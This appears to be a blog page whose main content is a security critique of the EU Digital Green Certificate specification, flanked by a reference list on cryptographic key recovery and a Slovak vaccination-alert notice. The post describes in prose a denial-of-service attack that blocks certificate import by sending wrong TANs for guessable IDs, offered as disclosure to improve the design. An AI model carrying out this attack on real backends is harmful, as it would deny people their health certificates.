  3. Jan Jancar, Vladimir Sedlacek, Petr Svenda, Marek Sys: Minerva: The curse of ECDSA nonces 

  4. CryptoHackers: RECOVERING A FULL PEM PRIVATE KEY WHEN HALF OF IT IS REDACTED 

  5. Nadia Heninger, Hovav Shacham: Reconstructing RSA Private Keys from Random Key Bits 

  6. Gabrielle de Micheli, Nadia Heninger: Recovering cryptographic keys from partial information, by example 

  7. David Naccache, Nigel P. Smart, Jacques Stern: Projective Coordinates Leak 

  8. Alejandro Cabrera Aldaya, Cesar Pereida García, Billy Bob Brumley: From A to Z: Projective coordinates leakage in the wild 

  9. Robert Merget, Marcus Brinkmann, Nimrod Aviram, Juraj Somorovsky, Johannes Mittmann, Jörg Schwenk: Raccoon attack 


Digital Green Certificates: Security analysis not included

Digital Green Certificates: Security analysis not included

Every EU member state is rushing to implement Digital Green Certificates until the end of June, yet no one is stopping to look at their security.

Digital Green Certificates are a European solution to the problem of free movement in the times of the COVID pandemic. The idea is that while traveling to some other country in the EU, you won’t have to mess about with the random paper confirmation of vaccination you got at the vaccination place but instead will be able to present a standardized and interoperable vaccination or test certificate that the authorities of each member state will validate. The need for interoperability is significant, and thanks to the European Commission the opportunity to standardize on one format was used. In this post, I look at the design of Digital Green Certificates from a security perspective and outline several security issues.

Digital Green Certificates#

The Digital Green Certificate (DGC) is digital proof that a person has been vaccinated against COVID-19, received a negative test result, or recovered from COVID-19. It is valid in all EU countries, and even though it contains the word digital in its name, it can be in the form of a paper or a digital certificate1. In the end it is just a QR code that has the vaccination/test/recovery data in it, signed by an issuing body from some member state. This is supported by public key infrastructure similar to the one used in e-passports that will be centrally operated by the EU (DIGIT). The QR code contains data such as the name of the holder, date of birth, type of the certificate, and respective certificate data (e.g., date of vaccination, vaccine name). Contrary to many claims in the media - one even from the Slovak government agency implementing the DGC apps2 - the data on the QR code can be read by anyone and its confidentiality is not protected.

The technical specifications can be found here and are published by the eHealth network which is an EU body with members from all member states and Norway. The main technical specifications discussed in this post are the Technical Specifications for Digital Green Certificates:

The European Commission has tasked Deutsche Telekom and SAP to develop reference implementations of all of the required components, which can be found under the eu-digital-green-certificates Github organization, take particular note of the dgc-overview repository. Some additional specification details and components are also under the ehn-dcc-development Github organization, specifically the hcert-spec repository. There is also a Slack space provided by the Linux Foundation Public Health initiative that you can join here.

In the typical usage scenario, a person gets vaccinated and receives a paper or an email document containing the DGC (a QR code). This QR code can be scanned into a DGC wallet app which stores the person’s certificates. If the person then decides to travel to some EU state they can present the DGC using the wallet app or on paper to a border officer who will use a verifier app to verify that the DGC is valid and verify their identity against the data in the DGC. Both the wallet app and the verifier app communicate with a national backend and are developed by each member state.

The TAN factor#

Many aspects of the DGC architecture are well specified and required from implementors. However the member states are free to implement their parts of the infrastructure (wallet app, verifier app, issuer app, national backend) as they see fit with only some requirements on interoperability. Volume 4 of the specifications, which concerns the wallet and verifier apps, is not a normative specification but rather a description of the reference implementation and the closest guide one can get as to how the nationally developed apps are going to look like.

The wallet app specification describes how a user imports a DGC into the app. In this description, a TAN (Transaction Authentication Number) can be first seen. This TAN is described as a second factor that is generated with the DGC when it is issued and then sent to the user. During import of the DGC into the wallet app, the user has to scan the DGC and enter the correct TAN which is sent to the backend where it is validated against the TAN stored with the ID of the DGC. The backend allows the import only if the DGC hasn’t been previously imported and if the TAN is correct. If several incorrect TAN guesses are sent to the backend for a given DGC ID that ID is blocked and the DGC cannot be imported into the wallet app. During this import process, the app also generates a keypair (of an unspecified type) and sends the generated public key to the backend, where it is stored if the import was successful.

User story 2, transferring a Green Certificate to the wallet app

That’s enough for the description of how the app works, let’s now get to where the security issues are. To start off, the TAN is not really a second factor. The specification explicitly allows the TAN to be sent to the user alongside the DGC (page 15 of Volume 4):

Second, the TAN could be returned in conjunction with the signed DGC (as shown in the flow diagram below) or sent directly to the user’s phone.

See the issue? If the TAN is just sent alongside the DGC it cannot be a second factor. Why is there a need for a second factor here? If I somehow obtain a user’s DGC I will just print it on paper and not mess with an app that will not let me import the DGC, or if I want to make the extra effort, I will just make a clone of the app which has no such TAN check on import, but is otherwise identical. Now you might be thinking, okay, but there’s a keypair generated on import in the legitimate app and the public key gets sent to the backend so surely having the DGC in a rogue app will not help you because the verifier app checks with the backend that the DGC was imported and somehow challenges the wallet app to prove possession of the corresponding private key. Well, think again, the generated keypair is not mentioned in the rest of the document and thus it doesn’t matter that the rogue app doesn’t have the private key. In fact, it doesn’t even matter that there is some TAN check as the original paper DGC is still valid and could be used just like the digital one.

Thus, the whole TAN check and public key binding on the backend is a completely useless security measure and will always be useless as long as paper and in-app DGCs have to be treated the same. As one cannot discriminate against people with paper DGCs any attempts at better security properties than those of the paper DGCs are pointless. The inclusion of security measures which do not provide additional security is a red flag when looking at any system, as it usually means that the designers did not know why they added the security measure.

In fact, the introduction of this TAN check and public key binding nonsense introduced properties that make the app less usable and thus the system as a whole less secure. As designed, the DGC is importable only into one wallet app on one device and this can be done only once. See the issue again? This already disallows the scenario where parents traveling with children would both like to have their children’s certificates in their wallet apps or similar multi-user scenarios. What happens if the user uninstalls the app or loses the device that they imported their DGCs into? If one DGC is allowed to reside only in one (official) wallet app, then the wallet app provides worse usability and user experience than just keeping the DGC in the form of a document or image file. Thus rendering any potential security properties gained from users using the app pointless and driving the users away from the app and potentially towards malicious apps. It is also an undocumented limitation of the system that the reference wallet app does not warn the user about. The added complexity of dealing with DGC recovery after a lost device, which is currently unhandled, is another unnecessary burden introduced with the addition of the innocuous TAN check and public key binding.

As the final cherry on the cake of bad security properties the validation of the TAN on the backend during DGC import in the wallet app creates a possibility of a DoS attack against DGCs that were not yet imported and where the attacker knows or can guess the ID of the DGC. The attack is simple, the attacker simply sends a few requests with the wrong TAN as if they were importing the target DGC in the app (the request doesn’t contain the whole DGC but just its ID, the TAN and the generated public key) and after several tries the backend blocks the DGC from being imported into the official app. As the specification does not require the DGC IDs to be unpredictable or unknown to the attacker this attack is clearly feasible and nothing stops a member state from issuing DGCs with IDs that simply increment. This missing requirement with important impact on security is a clear example of the overall state of the DGC specifications with regards to security.

I was not the first to spot and point out some of the issues presented here, the Github user jquade posted this issue on the dgc-overview repository on May 2. The issue outlines the pointlessness of the TAN check. It was closed on May 6 with a comment that did not refute any of its points and gave a handwaving argument for the public key binding mentioning some future online scenarios.

Security analysis not included#

The DGC specification does not even have a clear threat model which would describe what sorts of attackers it aims at. Even questions such as: What security properties does the system claim to have? Is it supposed to stop theft of DGCs, counterfeiting of DGCs, impersonation, …? are left unanswered. The only part of the specification explicitly focusing on security is found in Volume 1 on pages 8 and 9. It considers such risks as the signing algorithm (ECDSA) being found weak!? but disregards many important risks with regards to the apps by claiming that:

These cannot preemptively be accounted for in this specification but must be identified, analyzed and monitored by the Participants.

How incredibly helpful to find this in place of a proper security design and analysis 🤦.

Conclusions#

This post presented several issues with the current specification of the Digital Green Certificates. To address the presented issues I suggest to:

  • Drop the TAN and public key binding parts from Volume 4 of the specification as well as the reference implementation. Doing so decreases the complexity of the design (Keep It Simple Stupid), increases the usability of the app and aligns security with the paper form of DGCs.
  • Have proper security design and analysis be part of the specification, written and reviewed by experts who know what they are doing. Digital contact tracing caught the attention of many researchers, a search on eprint.iacr.org for “contact tracing” gives 33 results, yet it gives 0 for “digital green certificate”. The EU has tons of great researchers and for spotting issues like the mentioned an ordinary IT security student should be sufficient and should spot them.
  • Provide better guidance to the developers of the member states not only on the interoperability part, but also on their apps, their security, user experience and usability. If this is the state of the specification the developers are going off, the implementations are going to be different and likely worse (see 2 for an example).

To not have this post be a completely negative one, I will end on a positive note. The transparency of the DGC implementation process is laudable. The specifications are public and readable, the reference implementations along with many components used are open-source, the Github repositories are active with issues and pull requests being handled. Without all of this, this post wouldn’t exist and one could not even begin to look at the security of this system that is being implemented all across the EU.


  1. https://ec.europa.eu/info/live-work-travel-eu/coronavirus-response/safe-covid-19-vaccines-europeans/eu-digital-covid-certificate_en 

  2. They claimed that only a special “certified” verification app will be able to access the data in the certificate as they will be encrypted and the key will be stored in the verification app. 


COVID-19 vaccination notifications in Slovakia

Ak hľadáte stránku na odber notifikácii o COVID-19 očkovaní na Slovensku, nájdete ju na covid.neuromancer.sk. Stránka poskytuje notifikácie na Váš email o voľných miestach na očkovanie proti ochoreniu COVID-19 a tiež o momente otvorenia očkovacieho formuláru pre nové skupiny obyvateľov. Stránka používa informácie od NCZI avšak nie je s NCZI alebo Ministerstvom Zdravotníctva akokoľvek asociovaná. Pre registráciu na očkovanie použite formulár NCZI.


 Prev
1   2   3   4